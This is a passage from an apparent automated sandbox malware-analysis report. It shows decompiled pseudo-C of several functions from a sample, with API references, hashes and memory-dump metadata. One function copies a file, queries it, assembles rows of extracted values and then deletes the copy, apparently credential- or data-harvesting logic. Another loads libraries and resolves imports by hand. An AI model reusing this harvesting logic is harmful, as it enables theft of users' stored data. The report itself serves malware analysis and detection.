					_t18 =  &_v12; // 0x414044
					wsprintfA( &_v1020, "%d",  *_t18);
					return  &_v1020;
				} else {
					goto L8;
				}
				do {
					L8:
					_t29 = _t29 + _v20;
					if( *_t29 == 0) {
						_v12 = _v12 + 1;
					}
					_t39 =  *((intOrPtr*)(_t29 + 4));
					_v16 = _v16 + _t39;
					_v20 = _t39;
				} while (_v16 < _t40);
				goto L11;
			}

0x0040ea1e
0x0040ea1f
0x0040ea21
0x0040ea24
0x0040ea27
0x0040ea2a
0x0040ea2d
0x0040ea5f
0x0040ea5f
0x0040ea68
0x00000000
0x00000000
0x0040ea3e
0x0040eab9
0x0040eabc
0x0040eac1
0x0040eac2
0x00000000
0x0040eac2
0x0040ea42
0x0040ea45
0x0040ea4a
0x0040ea53
0x0040ea58
0x00000000
0x0040ea5a
0x0040ea5d
0x0040ea5e
0x00000000
0x0040ea5e
0x0040ea58
0x0040ea6a
0x0040ea6d
0x0040ea71
0x0040ea8b
0x0040ea8c
0x0040ea95
0x00000000
0x00000000
0x0040ea97
0x0040eaa6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ea73
0x0040ea73
0x0040ea73
0x0040ea78
0x0040ea7a
0x0040ea7a
0x0040ea7d
0x0040ea80
0x0040ea83
0x0040ea86
0x00000000

APIs

GetLastError.KERNEL32 ref: 0040EA35
GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040EA60
wsprintfA.USER32 ref: 0040EAA6

Part of subcall function 0040EE19: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040EE27
Part of subcall function 0040EE19: HeapFree.KERNEL32(00000000), ref: 0040EE2E

Strings

D@A, xrefs: 0040EA97

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: Heap$ErrorFreeInformationLastLogicalProcessProcessorwsprintf
String ID: D@A
API String ID: 879827129-2037432845
Opcode ID: 36555a775a3f44d376f7c5023b7f62df5307be6b569c94822486449d7435c49c
Instruction ID: 01f9fa2f7c565afa4b3c44766f383cbee8621eed2eaa688fd3f83af7a52ff471
Opcode Fuzzy Hash: 36555a775a3f44d376f7c5023b7f62df5307be6b569c94822486449d7435c49c
Instruction Fuzzy Hash: A5214572E00109EFCB14DF97D8809AEB779FBC4704B54847FE101B2291DB394EA59E58

Uniqueness

Uniqueness Score: -1.00%

Function 0040F09E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0040F0C9
memset.MSVCRT ref: 0040F12A

Strings

image/jpeg, xrefs: 0040F0F4

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: mallocmemset
String ID: image/jpeg
API String ID: 2882185209-3785015651
Opcode ID: 444a528ac623e83a008e01fbbc40b794201cbbfcc4dbbce6f0a8a9c5fe24b184
Instruction ID: 0e8fbf802db2136d01575167f6e01c4ab0e0a8e209efd6e655735a85e62e13ba
Opcode Fuzzy Hash: 444a528ac623e83a008e01fbbc40b794201cbbfcc4dbbce6f0a8a9c5fe24b184
Instruction Fuzzy Hash: 8B11BB72C00118EBCB218FA4DD4198EBB79FB88760F218273F911BA6E1C3705A489A94

Uniqueness

Uniqueness Score: -1.00%

Function 00407A6E Relevance: 6.2, APIs: 4, Instructions: 206
filestringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00407A6E(void* __ecx, void* __eflags, CHAR* _a4, char _a16, char _a28, char _a40) {
				char _v8;
				char _v12;
				char _v24;
				CHAR* _v36;
				char _v48;
				char _v60;
				char _v72;
				char _v84;
				char _v96;
				char _v108;
				char _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t84;
				void* _t115;
				void* _t133;
				void* _t137;
				void* _t140;
				void* _t166;
				void* _t181;
				void* _t182;
				void* _t187;
				void* _t191;
				void* _t225;
				void* _t226;

				_t230 = __eflags;
				_t181 = __ecx;
				E004100ED( &_v36, __eflags, 0x411be1);
				E0041018C(E00410208( &_v36, _t181,  &_v72, __eflags,  *0x6153e4), _t181,  &_v36);
				E00401859(_v72);
				_t84 = E0040EEA9(0x411be1,  &_v60, _t230, 0x1a);
				_pop(_t182);
				E0041018C(E004101C6( &_v36, _t182, _t84,  &_v72, _t230), _t182,  &_v36);
				E00401859(_v72);
				E00401859(_v60);
				CopyFileA(_a4, _v36, 1);
				E004100ED( &_v48, _t230, 0x411be1);
				E0041018C(E00410208(E004101C6(E00410208(E004101C6(E00410208(E00410208( &_v48, _t182,  &_v108, _t230,  *0x6153f4), _t182,  &_v96, _t230, 0x411be4), _t182,  &_a28,  &_v84, _t230), _t182,  &_v24, _t230, "_"), _t182,  &_a16,  &_v60, _t230), _t182,  &_v72, _t230,  *0x615248), _t182,  &_v48);
				E00401859(_v72);
				E00401859(_v60);
				E00401859(_v24);
				E00401859(_v84);
				E00401859(_v96);
				E00401859(_v108);
				_t115 =  *0x6155c0(_a4,  &_v12);
				if(_t115 == 0) {
					_t133 =  *0x61557c(_v12,  *0x615054, 0xffffffff,  &_v8, _t115);
					_t226 = _t225 + 0x14;
					_t232 = _t133;
					if(_t133 == 0) {
						E004100ED( &_v24, _t232, 0x411be1);
						while(1) {
							_t137 =  *0x615598(_v8);
							_pop(_t187);
							if(_t137 != 0x64) {
								break;
							}
							E004100ED( &_v72, __eflags,  *0x6155b4(_v8, 0));
							_t140 =  *0x6155b4(_v8, 1);
							_pop(_t191);
							E004100ED( &_v60, __eflags, _t140);
							E0041018C(E004101C6( &_v24, _t191,  &_v72,  &_v108, __eflags), _t191,  &_v24);
							E00401859(_v108);
							E0041018C(E00410208( &_v24, _t191,  &_v96, __eflags, "\t"), _t191,  &_v24);
							E00401859(_v96);
							E0041018C(E004101C6( &_v24, _t191,  &_v60,  &_v84, __eflags), _t191,  &_v24);
							E00401859(_v84);
							E0041018C(E00410208( &_v24, _t191,  &_v120, __eflags, "\n"), _t191,  &_v24);
							E00401859(_v120);
							E00401859(_v60);
							E00401859(_v72);
						}
						_t166 =  *0x61567c(_v24);
						_t234 = _t166 - 5;
						if(_t166 > 5) {
							_push( *0x61567c(_v24));
							_push(_v24);
							_t227 = _t226 - 0xc;
							E0041011F( &_v48, _t187, _t226 - 0xc, _t234);
							E004016EB( &_a40, _t227 - 0x50);
							_push( &_v120);
							E00403F95(_t187, _t234);
							E00401859(_v120);
						}
						E00401859(_v24);
						E00401859(0);
					}
					 *0x61559c(_v8);
					 *0x6155c4(_v12);
				}
				DeleteFileA(_v36);
				E00401859(_v36);
				E00401859(_v48);
				E00401859(0);
				E00401859(0);
				E00401859(_a4);
				E00401859(_a16);
				E00401859(_a28);
				return E004016CC( &_a40);
			}

0x00407a6e
0x00407a6e
0x00407a80
0x00407a99
0x00407aa1
0x00407aab
0x00407ab2
0x00407ac1
0x00407ac9
0x00407ad1
0x00407ade
0x00407ae8
0x00407b3f
0x00407b47
0x00407b4f
0x00407b57
0x00407b5f
0x00407b67
0x00407b6f
0x00407b7b
0x00407b85
0x00407b9b
0x00407ba1
0x00407ba4
0x00407ba6
0x00407bb0
0x00407c72
0x00407c75
0x00407c7b
0x00407c7f
0x00000000
0x00000000
0x00407bcb
0x00407bd5
0x00407bdc
0x00407be1
0x00407bf7
0x00407bff
0x00407c17
0x00407c1f
0x00407c35
0x00407c3d
0x00407c55
0x00407c5d
0x00407c65
0x00407c6d
0x00407c6d
0x00407c88
0x00407c8e
0x00407c91
0x00407c9c
0x00407c9d
0x00407ca3
0x00407ca8
0x00407cb5
0x00407cbd
0x00407cbe
0x00407cc9
0x00407cc9
0x00407cd1
0x00407cd8
0x00407cd8
0x00407ce0
0x00407ce9
0x00407cf0
0x00407cf4
0x00407cfd
0x00407d05
0x00407d0c
0x00407d13
0x00407d1b
0x00407d23
0x00407d2b
0x00407d3c

APIs

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

Part of subcall function 0040EEA9: GetSystemTime.KERNEL32(?,00411BE1,00000000,?,?,?,?,?,?,?,00403A28,00000014), ref: 0040EECE

Part of subcall function 004101C6: lstrcpy.KERNEL32(00000000,?), ref: 004101F4
Part of subcall function 004101C6: lstrcat.KERNEL32(?,00000000), ref: 004101FE

CopyFileA.KERNEL32(?,?,00000001), ref: 00407ADE
lstrlen.KERNEL32(?), ref: 00407C88
lstrlen.KERNEL32(?), ref: 00407C96
DeleteFileA.KERNEL32(?,?), ref: 00407CF4

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 743300c49f113a2fd297a5535984aaf9268109d1c4567e2dda3429a7ff785b49
Instruction ID: 5fa2792cd1652cf8b8ab755a9808467b366e4512584a33542aba545c460c1053
Opcode Fuzzy Hash: 743300c49f113a2fd297a5535984aaf9268109d1c4567e2dda3429a7ff785b49
Instruction Fuzzy Hash: 8381B532D00119EBCF00FBA6DD469CDB775EF04309B11802BF516B70B1DA79AE868B99

Uniqueness

Uniqueness Score: -1.00%

Function 00407D3D Relevance: 6.2, APIs: 4, Instructions: 180
filestringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00407D3D(void* __ecx, void* __eflags, CHAR* _a4, char _a16, char _a28, char _a40) {
				char _v8;
				char _v12;
				char _v24;
				CHAR* _v36;
				char _v48;
				char _v60;
				char _v72;
				char _v84;
				char _v96;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t71;
				void* _t102;
				void* _t120;
				void* _t124;
				void* _t125;
				void* _t139;
				void* _t154;
				void* _t155;
				void* _t160;
				void* _t162;
				void* _t190;
				void* _t191;

				_t195 = __eflags;
				_t154 = __ecx;
				E004100ED( &_v36, __eflags, 0x411be1);
				E0041018C(E00410208( &_v36, _t154,  &_v60, __eflags,  *0x6153e4), _t154,  &_v36);
				E00401859(_v60);
				_t71 = E0040EEA9(0x411be1,  &_v48, _t195, 0x1a);
				_pop(_t155);
				E0041018C(E004101C6( &_v36, _t155, _t71,  &_v60, _t195), _t155,  &_v36);
				E00401859(_v60);
				E00401859(_v48);
				CopyFileA(_a4, _v36, 1);
				E004100ED( &_v48, _t195, 0x411be1);
				E0041018C(E00410208(E004101C6(E00410208(E004101C6(E00410208(E00410208( &_v48, _t155,  &_v108, _t195,  *0x615328), _t155,  &_v96, _t195, 0x411be4), _t155,  &_a28,  &_v84, _t195), _t155,  &_v72, _t195, "_"), _t155,  &_a16,  &_v24, _t195), _t155,  &_v60, _t195,  *0x615248), _t155,  &_v48);
				E00401859(_v60);
				E00401859(_v24);
				E00401859(_v72);
				E00401859(_v84);
				E00401859(_v96);
				E00401859(_v108);
				_t102 =  *0x6155c0(_a4,  &_v12);
				if(_t102 == 0) {
					_t120 =  *0x61557c(_v12,  *0x6151bc, 0xffffffff,  &_v8, _t102);
					_t191 = _t190 + 0x14;
					_t197 = _t120;
					if(_t120 == 0) {
						E004100ED( &_v24, _t197, 0x411be1);
						while(1) {
							_t124 =  *0x615598(_v8);
							_pop(_t160);
							if(_t124 != 0x64) {
								break;
							}
							_t125 =  *0x6155b4(_v8, 0);
							_pop(_t162);
							E004100ED( &_v60, __eflags, _t125);
							E0041018C(E004101C6( &_v24, _t162,  &_v60,  &_v108, __eflags), _t162,  &_v24);
							E00401859(_v108);
							E0041018C(E00410208( &_v24, _t162,  &_v96, __eflags, "\n"), _t162,  &_v24);
							E00401859(_v96);
							E00401859(_v60);
						}
						_t139 =  *0x61567c(_v24);
						_t199 = _t139 - 5;
						if(_t139 > 5) {
							_push( *0x61567c(_v24));
							_push(_v24);
							E0041011F( &_v48, _t160, _t191 - 0xc, _t199);
							E004016EB( &_a40, _t191 - 0xffffffffffffffbc);
							_push( &_v108);
							E00403F95(_t160, _t199);
							E00401859(_v108);
						}
						E00401859(_v24);
						E00401859(0);
					}
					 *0x61559c(_v8);
					 *0x6155c4(_v12);
				}
				DeleteFileA(_v36);
				E00401859(_v36);
				E00401859(_v48);
				E00401859(0);
				E00401859(0);
				E00401859(_a4);
				E00401859(_a16);
				E00401859(_a28);
				return E004016CC( &_a40);
			}

0x00407d3d
0x00407d3d
0x00407d4f
0x00407d68
0x00407d70
0x00407d7a
0x00407d81
0x00407d90
0x00407d98
0x00407da0
0x00407dad
0x00407db7
0x00407e0e
0x00407e16
0x00407e1e
0x00407e26
0x00407e2e
0x00407e36
0x00407e3e
0x00407e4a
0x00407e54
0x00407e6a
0x00407e70
0x00407e73
0x00407e75
0x00407e7f
0x00407ee1
0x00407ee4
0x00407eea
0x00407eee
0x00000000
0x00000000
0x00407e8b
0x00407e92
0x00407e97
0x00407eac
0x00407eb4
0x00407ecc
0x00407ed4
0x00407edc
0x00407edc
0x00407ef3
0x00407ef9
0x00407efc
0x00407f07
0x00407f08
0x00407f13
0x00407f20
0x00407f28
0x00407f29
0x00407f34
0x00407f34
0x00407f3c
0x00407f43
0x00407f43
0x00407f4b
0x00407f54
0x00407f5b
0x00407f5f
0x00407f68
0x00407f70
0x00407f77
0x00407f7e
0x00407f86
0x00407f8e
0x00407f96
0x00407fa7

APIs

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

Part of subcall function 0040EEA9: GetSystemTime.KERNEL32(?,00411BE1,00000000,?,?,?,?,?,?,?,00403A28,00000014), ref: 0040EECE

Part of subcall function 004101C6: lstrcpy.KERNEL32(00000000,?), ref: 004101F4
Part of subcall function 004101C6: lstrcat.KERNEL32(?,00000000), ref: 004101FE

CopyFileA.KERNEL32(?,?,00000001), ref: 00407DAD
lstrlen.KERNEL32(?), ref: 00407EF3
lstrlen.KERNEL32(?), ref: 00407F01
DeleteFileA.KERNEL32(?,?), ref: 00407F5F

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 66aa1a3a7bb532ee74e12e2dfeb7f651dc2d02b8bd016edcff8947e41b56672a
Instruction ID: 67421e9fb3548eb23ea6503b6b64b5d523c3339e7964126502c7f18beb8a8e8a
Opcode Fuzzy Hash: 66aa1a3a7bb532ee74e12e2dfeb7f651dc2d02b8bd016edcff8947e41b56672a
Instruction Fuzzy Hash: BC61C732D00119EBCF00FBA6ED469CDB775EF04308B11802BF516B71B1DA79AE858B99

Uniqueness

Uniqueness Score: -1.00%

Function 00410208 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 33stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
lstrcpy.KERNEL32(00000000,?), ref: 00410244
lstrcat.KERNEL32(?,00000000), ref: 0041024F

Strings

H@A, xrefs: 00410217

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcatlstrcpylstrlen
String ID: H@A
API String ID: 3050337572-1886010217
Opcode ID: e28a7acd5c66e659b50bd1e7d4f56d3dbe9f43e26bbc3677fc8717ceca5708f3
Instruction ID: 14ccc574a1e925f84fa89d90440c2169db4250773d745b43c6637a05a6b5fe13
Opcode Fuzzy Hash: e28a7acd5c66e659b50bd1e7d4f56d3dbe9f43e26bbc3677fc8717ceca5708f3
Instruction Fuzzy Hash: 01F03076400701DBDB205F65D80CB96BBF9EF84762F24882EF995C2260D774D8D4CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00404E9A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106
libraryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00404E9A(void* __ebx) {
				signed int _v8;
				signed int _v12;
				struct HINSTANCE__* _v16;
				int _v20;
				void* _v24;
				intOrPtr _t44;
				intOrPtr _t46;
				signed int _t47;
				void* _t48;
				signed int _t49;
				intOrPtr _t51;
				signed short _t53;
				CHAR* _t54;
				signed int _t55;
				signed int _t56;
				signed int _t58;
				signed int _t59;
				signed int _t62;
				void* _t65;
				signed int _t70;
				signed int _t78;
				signed int _t83;
				void* _t85;

				_t65 = __ebx;
				_t44 =  *((intOrPtr*)(__ebx + 0xc0));
				_v12 = _v12 & 0x00000000;
				if(_t44 == 0 ||  *((intOrPtr*)(__ebx + 0xc4)) == 0) {
					L23:
					return 0;
				} else {
					_t83 =  *((intOrPtr*)(__ebx + 0x144)) + _t44;
					while(1) {
						_t46 =  *((intOrPtr*)(_t83 + 0xc));
						_v8 = _t83;
						if(_t46 == 0) {
							goto L23;
						}
						_t47 = LoadLibraryA( *((intOrPtr*)(_t65 + 0x144)) + _t46);
						_v16 = _t47;
						__eflags = _t47;
						if(_t47 == 0) {
							L25:
							_push(6);
							L26:
							_pop(_t48);
							return _t48;
						}
						_t49 =  *(_t65 + 0x154);
						__eflags =  *(_t65 + 0x150) - _t49;
						if( *(_t65 + 0x150) < _t49) {
							L12:
							 *((intOrPtr*)(_v12 +  *(_t65 + 0x150) * 4)) = _v16;
							 *(_t65 + 0x150) =  *(_t65 + 0x150) + 1;
							_t51 =  *((intOrPtr*)(_t65 + 0x144));
							_t78 =  *((intOrPtr*)(_t83 + 0x10)) + _t51;
							__eflags =  *(_t83 + 4);
							_v8 = _t78;
							if( *(_t83 + 4) == 0) {
								while(1) {
									L20:
									_t41 =  &_v8; // 0x6159e0
									_t53 =  *( *_t41);
									__eflags = _t53;
									if(__eflags == 0) {
										break;
									}
									if(__eflags >= 0) {
										_t54 = _t53 +  *((intOrPtr*)(_t65 + 0x144)) + 2;
									} else {
										_t54 = _t53 & 0x0000ffff;
									}
									_t55 = GetProcAddress(_v16, _t54);
									 *_t78 = _t55;
									__eflags = _t55;
									if(_t55 == 0) {
										goto L25;
									} else {
										_v8 = _v8 + 4;
										_t78 = _t78 + 4;
										__eflags = _t78;
										continue;
									}
								}
								_t83 = _t83 + 0x14;
								__eflags = _t83;
								continue;
							}
							_t70 =  *_t83;
							__eflags = _t70;
							if(_t70 == 0) {
								_push(8);
								goto L26;
							}
							_v8 = _t70 + _t51;
							goto L20;
						}
						__eflags = _t49;
						if(_t49 == 0) {
							_t56 = 0x10;
						} else {
							_t56 = _t49 + _t49;
						}
						 *(_t65 + 0x154) = _t56;
						_t58 = E0040EE36(_t56 << 2);
						_v12 = _t58;
						__eflags = _t58;
						if(_t58 == 0) {
							_push(3);
							goto L26;
						} else {
							_t59 =  *(_t65 + 0x150);
							__eflags = _t59;
							if(_t59 != 0) {
								_t62 = _t59 << 2;
								__eflags = _t62;
								_v20 = _t62;
								_v24 =  *(_t65 + 0x14c);
								memcpy(_v12, _v24, _v20);
								_t85 = _t85 + 0xc;
								_t19 =  &_v8; // 0x6159e0
								_t83 =  *_t19;
							}
							E0040EE19( *(_t65 + 0x14c));
							 *(_t65 + 0x14c) = _v12;
							goto L12;
						}
					}
					goto L23;
				}
			}

0x00404e9a
0x00404ea0
0x00404ea6
0x00404eae
0x00404fd0
0x00000000
0x00404ec1
0x00404ec7
0x00404fc2
0x00404fc2
0x00404fc5
0x00404fca
0x00000000
0x00000000
0x00404ed7
0x00404edd
0x00404ee0
0x00404ee2
0x00404fd6
0x00404fd6
0x00404fd8
0x00404fd8
0x00000000
0x00404fd8
0x00404ee8
0x00404eee
0x00404ef4
0x00404f58
0x00404f64
0x00404f67
0x00404f6d
0x00404f76
0x00404f78
0x00404f7c
0x00404f7f
0x00404fb6
0x00404fb6
0x00404fb6
0x00404fb9
0x00404fbb
0x00404fbd
0x00000000
0x00000000
0x00404f8e
0x00404f9b
0x00404f90
0x00404f90
0x00404f90
0x00404fa3
0x00404fa9
0x00404fab
0x00404fad
0x00000000
0x00404faf
0x00404faf
0x00404fb3
0x00404fb3
0x00000000
0x00404fb3
0x00404fad
0x00404fbf
0x00404fbf
0x00000000
0x00404fbf
0x00404f81
0x00404f83
0x00404f85
0x00404fdf
0x00000000
0x00404fdf
0x00404f89
0x00000000
0x00404f89
0x00404ef6
0x00404ef8
0x00404f00
0x00404efa
0x00404efa
0x00404efa
0x00404f01
0x00404f0b
0x00404f11
0x00404f14
0x00404f16
0x00404fdb
0x00000000
0x00404f1c
0x00404f1c
0x00404f22
0x00404f24
0x00404f26
0x00404f26
0x00404f29
0x00404f32
0x00404f3e
0x00404f3e
0x00404f40
0x00404f40
0x00404f40
0x00404f49
0x00404f52
0x00000000
0x00404f52
0x00404f16
0x00000000
0x00404fc2

APIs

LoadLibraryA.KERNEL32(?,00000000,?,?,004050F7,?), ref: 00404ED7

Strings

Ya, xrefs: 00404FB6, 00404F40, 00404F9F

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: LibraryLoad
String ID: Ya
API String ID: 1029625771-3053265743
Opcode ID: 7157bb46d9291632600be70f634af2e9bb28f9e313ae63842e64220048d5757e
Instruction ID: a3e6dcaebf7256bd3ef89ce9058bfadd70554fa7841bce62e32249e3b63503f9
Opcode Fuzzy Hash: 7157bb46d9291632600be70f634af2e9bb28f9e313ae63842e64220048d5757e
Instruction Fuzzy Hash: 59414CB1A01206DFDF10CF64C940BAA77B5AB84355F1844BAED09EF385D7349910CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004010E1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 00401113

Strings

1852, xrefs: 004010E2
0dk, xrefs: 004010E9

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: ExitProcess
String ID: 0dk$1852
API String ID: 621844428-3245156965
Opcode ID: 095d324a0a95b74b34848f72be297ed1792c8f4da3cc9038bb5dfb2a25a037b8
Instruction ID: d9543933b20561bef229acb213c684680ee3f748cf23ae938b6cf0a249e47932
Opcode Fuzzy Hash: 095d324a0a95b74b34848f72be297ed1792c8f4da3cc9038bb5dfb2a25a037b8
Instruction Fuzzy Hash: CAE0BF35102620EBD72117A2AC8DDDBAE6EEFCA7B67445027F50691060C624080186F1

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE36 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EE36(char _a4) {

				_t1 =  &_a4; // 0x40ea53
				return RtlAllocateHeap(GetProcessHeap(), 8,  *_t1);
			}

0x0040ee39
0x0040ee4c

APIs

GetProcessHeap.KERNEL32(00000008,S@,?,0040EA53,00000000), ref: 0040EE3E
RtlAllocateHeap.NTDLL(00000000,?,0040EA53), ref: 0040EE45

Strings

S@, xrefs: 0040EE39

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
